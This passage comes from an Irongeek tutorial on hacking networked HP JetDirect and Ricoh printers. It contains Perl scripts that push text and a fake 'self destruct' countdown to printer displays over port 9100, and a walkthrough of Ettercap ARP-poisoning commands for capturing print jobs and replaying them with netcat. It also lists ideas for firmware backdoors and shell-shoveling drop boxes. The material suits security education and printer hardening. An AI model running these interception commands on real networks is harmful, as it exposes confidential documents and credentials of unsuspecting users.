#!/usr/bin/perl -w#File name: print.pjl.pl#From http://www.Irongeek.com [email protected]#Script to send a simple line of text to a HP JetDirect printer#Syntax: ./print.pjl.pl <ip-of-jetdirect> "Some Text To Print"use IO::Socket;$ip = $ARGV[0];$texttoprint = $ARGV[1];my $sock = new IO::Socket::INET (
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
29 of 37 02/04/2009 08:17
PeerAddr => $ip, PeerPort => '9100', Proto => 'tcp', );die "Could not create socket, Monkey boy! $!\n" unless $sock;print $sock $texttoprint;close($sock);
This one does a countdown on the LCD screen, then ends with a bang:
#!/usr/bin/perl -w#File name: selfdestructlcd.pjl.pl#From http://www.Irongeek.com [email protected] #Script to send a count down to the printers LCD, ending in a Bang.#Syntax: ./selfdestructlcd.pjl.pl <ip-of-jetdirect>use IO::Socket;$ip = $ARGV[0];my $sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => '9100', Proto => 'tcp', );die "Could not create socket, Monkey boy! $!\n" unless $sock;for ($i = 30; $i >= 0; $i--) { print $sock "\e%-12345X\@PJL RDYMSG DISPLAY = \"Self Destruct in $i\"\n"; print "\e%-12345X\@PJL RDYMSG DISPLAY = \"Self Destruct in $i\"\n"; sleep 1; }print $sock "\e%-12345X\@PJL RDYMSG DISPLAY = \"Bang!!!\"\n";sleep 5;print $sock "\e%-12345X\@PJL RDYMSG DISPLAY = \"Ready\"\n";print $sock "\e%-12345X\n";close($sock);
I know some of you want the script that lets you make a printer web cam like the one I had up for a short
while. You can download the PHP source code here:
http://irongeek.com/downloads/printeraction.txt
If you write any interesting scripts send them to me and I'll post them with your credits. Happy scripting!
Fixing a busted hard drive with Ghost
Matthew Hinton (info [at] fireshadow.net) sent me some details on fixing a broken hard drive in an HP 4100
MFP with Ghost, could be useful to quite a few of you in your printer is out of warranty:
Don't know if you'd be interested in the details for your page or not.
Where I work at we've been able to make a ghost image of the 4100 MFP hard
drive load. This allows us to put it on new hard drives to reinstall in
the EIO slot. What drove us to this insanity is as follows.
We have about 10 or so of the 4100 MFP's here. After the warranty
expired, they started getting the same error - "49.FF81 error" on the
display. Pretty much it's a new EIO hard disk. HP has a procedure that
may or may not work to reset it. $49 to talk to a tech over the phone
since it's out of warranty. $345 for a new EIO disk from HP. Local guy
wants $515 to come out with a new disk to fisk it.
Taking apart the bad one, we noticed that it's a standard Toshiba 20 Gb
laptop hard drive. The PC tech went and got a known good EIO hard disk,
and we made a ghost image of it. We tried sending the ghost image back
over to the bad drive, but got a "drive too smal error". The ghost image
took fine on a seagate 40 Gb note book drive. Put the seagate drive on
the controller card, reinstalled and it's working fine.
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
30 of 37 02/04/2009 08:17
Anyway, thanks for putting up the informative page. I'm using Hijetter
right now to look at the variables on the printer.
Sincerely,
Matthew Hinton
Sniffing print jobs and replaying them
How often do folk print things and think as long as no one gets hold of the hard copy there's no security risk? As
it turns out, sniffing print jobs is pretty easy if you can get on the same LAN segment as the printer or print server.
Since the print jobs are not encrypted sniffing and reprinting them to your own printer is comparatively a breeze if
you know how. This example shows how to sniff between a Windows 2003 base print server and a JetDirect or Ricoh
Savin based network printer that uses AppSocket (port 9100/tcp) for communications, but the principles should apply
to other setups as well.
1. First we have to pull off a MitM (Man in the Middle) attack by ARP poisoning the JetDirect box and the Windows
print server and saving the packets to a Pcap file. I'll use Ettercap on a Linux box to do this, but other apps may work
as well. To pull it off I will use the following Ettercap command:
ettercap -T -q -w print.dump -M ARP /192.168.1.2/ //
where 192.168.1.2 is the IP of my network printer. Note that this will cover all of your bases, but can cause one hell
of an ARP storm since Ettercap has to ARP poison every host on the subnet. In some cases it might be better (and
faster) to just ARP poison between two host you know the traffic will be going though. Here is an example:
ettercap -T -q -w print.dump -M ARP /192.168.1.2/ /192.168.22.47/
where 192.168.1.2 is the IP of the network printer and 192.168.22.47 is the ip of the Window/*nix print server or PC
sending the print job. Hit the "q" key at any time to stop the ARP poisoning and sniffing.
2. Now that we have our Pcap (also sometimes called a libpcap or tcpdump file) we have to open it up in Ethereal.
Just use the File->Open menu and point it to the print.dump file made by Ettercap.
3. Once print.dump has been opened in Ethereal we need to filter it. Enter the following filter and hit Apply:
tcp.flags.syn == 1 && tcp.dstport == 9100
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
31 of 37 02/04/2009 08:17
4. As you see from the screen shot above the filter got
rid of a lot of the extraneous data. These four packets
represent two print jobs, or at least the beginnings of
them. Packets number 158 and 159 are part of the same
print job. Packets number 510 and 511 are part the 2nd
print job. What we want to do now is right click every
other packet, starting with the first, and choose "Follow
TCP Stream".
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
32 of 37 02/04/2009 08:17
5. Once you have chosen "Follow TCP Stream" you should see a window something like the one above. Set the drop
down box to only show the traffic destined to the network printer as shown above. Set the data type to RAW and
then click the "Save As" button and call the output file something like "test1.job".
6. Repeat steps 4 and 5 for every other packet to get all of the print jobs captured.
7. At this point we could open up test "test1.job" in a text editor, and if it's a PostScript file, remove every line before:
%!PS-Adobe-3.0
and after:
%%EOF
to create a .PS file (PostScript) that could be opened up in GhostView on a *nix box. You might be able to do
something similar with a PCL based print job, but I have not figured out what parts to remove yet. As it stands we can
leave "test1.job" as it is, whether it's PCL or PostScript, and send it to the printer by replaying it with NetCat to a
network printer we control. The command is quite simple:
cat test1.job|netcat -q 0 192.168.1.2 9100
where "test1.job" is the sniffed print job we want to replay and 192.168.1.2 is a network printer that we control. If the
Netcat command seems too complex you could also just use an FTP client and FTP the captured print jobs to a
JetDirect enabled printer (assuming FTP is enabled on the JetDirect box).
All this seems a bit complicated I know, so I'm thinking of asking the Cain team to add this functionality to their
app to make it easier.
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
33 of 37 02/04/2009 08:17
A note on Plain-text authentication protocols
Many of the above attacks are only possible because people don't enable passwords on their network printers.
However, even if passwords are enabled they could still be sniffed pretty easily since most network printers use
simple telnet or a web interface with out SSL to configure the system. Both telnet and http (with out SSL) passwords
can easily be sniffed with packages like Ettercap, Cain or Dsniff. Some newer network printers, such as the HP
Jetdirect en3700 (J7942A), can use SSL with their web interface (albeit with a self signed certificate) and the
interface seems to be more that just a Java applet for using SNMP to control the Jetdirect. This is a much more secure
option than the older Jetdirects that used unencrypted HTTP and SNMP v1/v2.
Other Ideas
There's still a lot more out there I need to research and play with when it comes to hacking network printers. As
with most of my projects this is a work in progress so feel free to email me your ideas. A few interesting topics might
be:
Using Phenoelit's ChaiServices information to create worms, backdoor and other malware for HP
JetDirect printers.
Modifying the PFT source code to make automated apps for searching an IP space and pulling files off of
the network printers.
Vulnerabilities in network printer implementation like buffer overflows and such.
Hacking the firmware in JetDirects to create dial home (shell shoveling) drop boxes that could be left
behind on target networks to help with intrusions. For those wanting to help install the HP Download Manager
and look in "C:\Program Files\Hewlett-Packard\HP Download Manager\Upgrades\jetdirect" for the vendor
firmwares.
Tracking Dots: http://www.eff.org/Privacy/printers/list.php
Also don't forget to check out SecurityFocus' online vulnerabilities database (http://www.securityfocus.com/) to
see if your particular network printers have any outstanding issues. I know they have a few issues listed for some of
the JetDirect boxes. While you're at it, check for vulnerabilities in the base OS that the network printer uses,
VxWorks in the case of some JetDirects and NetBSD for the Ricoh Savins.
I hope you have found this article interesting. If you have any ideas or comments please feel free to e-mail me.
Happy printer hacking.
Links to Tools:
HP Web JetAdmin (without registering)
http://www.svrops.com/svrops/dwnldprog.htm
HP JetAdmin for Window 2000 3.42, the last version to be released
http://www.helpdesk.umd.edu/os/windows_nt/printing/674/
HP Download Manager (for upgrading firmware)
http://www.hp.com/go/dlm_sw
Ghostscript, Ghostview and GSview
http://www.cs.wisc.edu/~ghost/
SmartDeviceMonitor
http://www.ricoh-usa.com/products/product_features.asp?pCategoryId=
19&pSubCategoryId=46&pCatName=Solutions&pSubCatName=
Device%20Management&pProductId=67&pProductName=SmartDeviceMonitor&tsn=Ricoh-USA
Foundstone's SNScan (find network printers that use SNMP, which seems to be most of them)
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
34 of 37 02/04/2009 08:17
http://www.foundstone.com/resources/proddesc/snscan.htm
SoftPerfect's NetScan (also useful for scanning for SNMP services)
http://www.softperfect.com/products/networkscanner/
Silicosis' HP Printer Display Hack
http://www.irongeek.com/i.php?page=security/hphack
Irongeek's GUI HP Printer Display Hack
http://www.irongeek.com/i.php?page=security/jetdirecthack
IPIterator
http://www.irongeek.com/i.php?page=security/ipiterator
Hijetter
http://www.phenoelit.de/hp/download.html
Ettercap
http://ettercap.sourceforge.net/
Ethereal
http://www.ethereal.com/
NetCat
http://netcat.sourceforge.net/
Net-SNMP
http://net-snmp.sourceforge.net/
Media:
Here's a collection of videos and other media on Network Printer Hacking you might be interest in:
Network Printer Hacking: Irongeek's Presentation at Notacon 2006
http://irongeek.com/i.php?page=videos/notacon2006printerhacking
Slide and other resources from the above presentation
http://irongeek.com/downloads/notacon2006.zip
Infonomicon TV Ep 7
http://irongeek.com/i.php?page=videos/infonomicontv7
Useful links for further research:
Common print server port numbers
http://members.cruzio.com/~jeffl/sco/lp/printservers.htm
HP's guide to securing JetDirect printers
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=bpj05999
Understanding, Reversing, and Hacking HP Printers by Slobotron
http://www.searchlores.org/realicra/hp_slobo.htm
SecurityFocus' online vulnerabilities database
http://www.securityfocus.com/
Network Printers and Other Peripherals -- Vulnerabilities and Fixes by Dennis Mattison (Littlew0lf)
http://members.cox.net/ltlw0lf/printers/index.html
older version: http://freshmeat.net/articles/view/445/
Securing Network Print Jobs - An LRS White Paper
http://www.lrs.com/EOM/Solutions/Papers/secure.aspx
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
35 of 37 02/04/2009 08:17
Printer Job Language Technical Reference Manual
http://lprng.sourceforge.net/DISTRIB/RESOURCES/DOCS/pjltkref.pdf
Printers, Proxies and Pranksters An April Fool's Recipe for Fun by Kellegous
http://web.kellegous.com/scratch/2003/printers1KBXB/
RICOH Aficio 2035 "security'' by mslaviero
http://www.cs.up.ac.za/cs/mslaviero/archives/2005/04/28/ricoh-afficio-2035-security-or-lack-thereof/
Special thanks to Nancy for proof reading and making my English intelligible.
Change Log
02/06/2007: I've updated info on the fix for the Pharos cached print job vulnerability
01/20/2007: HP seems to have released a fix for the FTP DoS problem. See the Printer DoSing section.
01/10/2007: Fixed and added some links in the Printer DoSing section.
01/06/2007: Add information on the Joxean Koret attack to the Printer DoSing section.
04/18/2006: Added link to a newer version of Littlew0lf's article.
04/10/2006: Added Media section.
04/02/2006: Added a bunch of information for my presentation at Notacon 2006
Added section: Stupid Printer Tricks
Added section: Finding info about the printer using SNMP tools.
Added section: Finding Printers with Google.
Added section: RSH commands and Richo Savin Aficio Printers.
Added section: Spamming Printers.
Added section: Getting a JetDirect password remotely using the SNMP vulnerability
Added information about SSL with newer Jetdirects to A note on Plain-text authentication protocols and
JetDirect password notes sections.
Added information on SmartDeviceMonitor to Finding Network printers using Nmap and SNMP tools
and Finding info about the printer using SNMP tools as well as adding screenshot of the SNMP tools
mentioned. I also added some details on finding network printers via their MAC address.
Added information on holding a connection to port 9100/tcp to DoSing the network or the printer.
Added information on IPX/AppleTalk/SMB to Intro to the concepts.
Added alternate Perl script and added PHP web form to Coding your own scripts with PHP, Perl and
PJL.
Added HP firmware location to Other Ideas.
01/18/2006: Added section on Fixing a busted hard drive with Ghost.
09/14/2005: Found another missing image, the LCD Display icon from Hijetter. It's fixed now. I also added a link
suggested by Dick from Hack A Day.
09/14/2005: Hack A Day added a link to this site and I noticed that the Hijetter file system image was broken. It
should be fixed now.
09/13/2005: Added "Coding your own scripts with Perl and PJL" section.
09/11/2005: First posted.
Irongeek's Notes For Later:
nano /etc/init.d/sysklogd
-r
LAND attacks
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
36 of 37 02/04/2009 08:17
If you would like to republish one of the articles from this site on your webpage or print journal please contact
IronGeek.
Copyright 2007, IronGeek
Hacking Network Printers (Mostly HP JetDirects, but a little info on the... http://www.irongeek.com/i.php?page=security/networkprinterhacking...
37 of 37 02/04/2009 08:17